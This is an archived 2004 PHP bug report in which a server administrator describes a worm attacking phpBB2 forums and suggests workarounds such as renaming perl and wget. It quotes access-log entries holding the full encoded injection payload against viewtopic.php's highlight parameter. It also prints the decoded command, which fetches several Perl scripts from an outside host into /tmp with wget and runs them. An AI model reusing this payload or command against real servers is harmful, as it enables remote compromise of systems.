#31333 [NEW]: php worm Virus with phpBB2
| From: | andrew at tophk dot net | Date: | Wed, 29 Dec 2004 13:01:38 +0000 |
| Subject: | #31333 [NEW]: php worm Virus with phpBB2 | ||
| Groups: | php.bugs | ||
| Request: | Send a blank email to php-bugs+get-71209@lists.php.net to get a copy of this message | ||
From: andrew at tophk dot net
Operating system: Solaris 8 x86
PHP version: 4CVS-2004-12-29 (stable)
PHP Bug Type: Unknown/Other Function
Bug description: php worm Virus with phpBB2
Description:
------------
Problem :-
I feel many Apache+PHP+phpBB2 server got php Worm Virus.
My access log file show many server try to send that virus to my server.
This Virus can download and run some perl program in your server folder
/tmp or /var/tmp. And these would using much more CPU power.
I feel not just one version php Worm Virus. I have see some C program in
my /tmp.
I think that back hole not just in phpBB2. Other php program may be got
this back hole
Apache Access Log:-
p.s. the follow /forum/viewtopic.php is phpBB2 program file
66.98.142.28 - - [25/Dec/2004:17:30:03 +0800] "GET
/forum/viewtopic.php?t=206&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(1!
14)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252!
echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%!
252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252ech!
r(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
HTTP/1.0" 200 54016 "-" "lwp-trivial/1.41"
195.78.58.246 - - [25/Dec/2004:17:30:24 +0800] "GET
/forum/viewtopic.php?t=211&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(1!
14)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252!
echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%!
252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252ech!
r(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
HTTP/1.0" 200 27876 "-" "lwp-trivial/1.34"
Analyze Log result:-
66.98.142.28 - - [25/Dec/2004:17:30:03 +0800] "GET
/forum/viewtopic.php?t=206&highlight=%2527%252esystem(..DATA..)%252e%2527
HTTP/1.0" 200 27876 "-" "lwp-trivial/1.34"
..DATA.. Content is
(cd /tmp;wget www.visualcoders.net/spybot.txt;wget
www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget
www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl
spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt)
That mean the Virus doing the following step:-
cd /tmp;
wget www.visualcoders.net/spybot.txt;
wget www.visualcoders.net/worm1.txt;
wget www.visualcoders.net/php.txt;
wget www.visualcoders.net/ownz.txt;
wget www.visualcoders.net/zone.txt;
perl spybot.txt;perl worm1.txt;
perl ownz.txt;perl php.txt
p.s. Not just this version
My Action:-
Upgrade to Apache 1.3.33 No Use
Upgrade to PHP Version 4.3.11-dev No Use
Upgrade to phpBB 2.0.11 No Use
Change Program /usr/local/bin/perl or Useful
/usr/bin/perl filename to another name
Change Program 'wget' to another name Useful
Summary:-
That virus let me know how to Hack another Apache+PHP Server. I hope this
report can help your.
p.s. I think that problem is not just phpBB2
Thanks !!
--
Edit bug report at http://bugs.php.net/?id=31333&edit=1
--
Try a CVS snapshot (php4): http://bugs.php.net/fix.php?id=31333&r=trysnapshot4
Try a CVS snapshot (php5.0): http://bugs.php.net/fix.php?id=31333&r=trysnapshot50
Try a CVS snapshot (php5.1): http://bugs.php.net/fix.php?id=31333&r=trysnapshot51
Fixed in CVS: http://bugs.php.net/fix.php?id=31333&r=fixedcvs
Fixed in release: http://bugs.php.net/fix.php?id=31333&r=alreadyfixed
Need backtrace: http://bugs.php.net/fix.php?id=31333&r=needtrace
Need Reproduce Script: http://bugs.php.net/fix.php?id=31333&r=needscript
Try newer version: http://bugs.php.net/fix.php?id=31333&r=oldversion
Not developer issue: http://bugs.php.net/fix.php?id=31333&r=support
Expected behavior: http://bugs.php.net/fix.php?id=31333&r=notwrong
Not enough info: http://bugs.php.net/fix.php?id=31333&r=notenoughinfo
Submitted twice: http://bugs.php.net/fix.php?id=31333&r=submittedtwice
register_globals: http://bugs.php.net/fix.php?id=31333&r=globals
PHP 3 support discontinued: http://bugs.php.net/fix.php?id=31333&r=php3
Daylight Savings: http://bugs.php.net/fix.php?id=31333&r=dst
IIS Stability: http://bugs.php.net/fix.php?id=31333&r=isapi
Install GNU Sed: http://bugs.php.net/fix.php?id=31333&r=gnused
Floating point limitations: http://bugs.php.net/fix.php?id=31333&r=float
No Zend Extensions: http://bugs.php.net/fix.php?id=31333&r=nozend
MySQL Configuration Error: http://bugs.php.net/fix.php?id=31333&r=mysqlcfg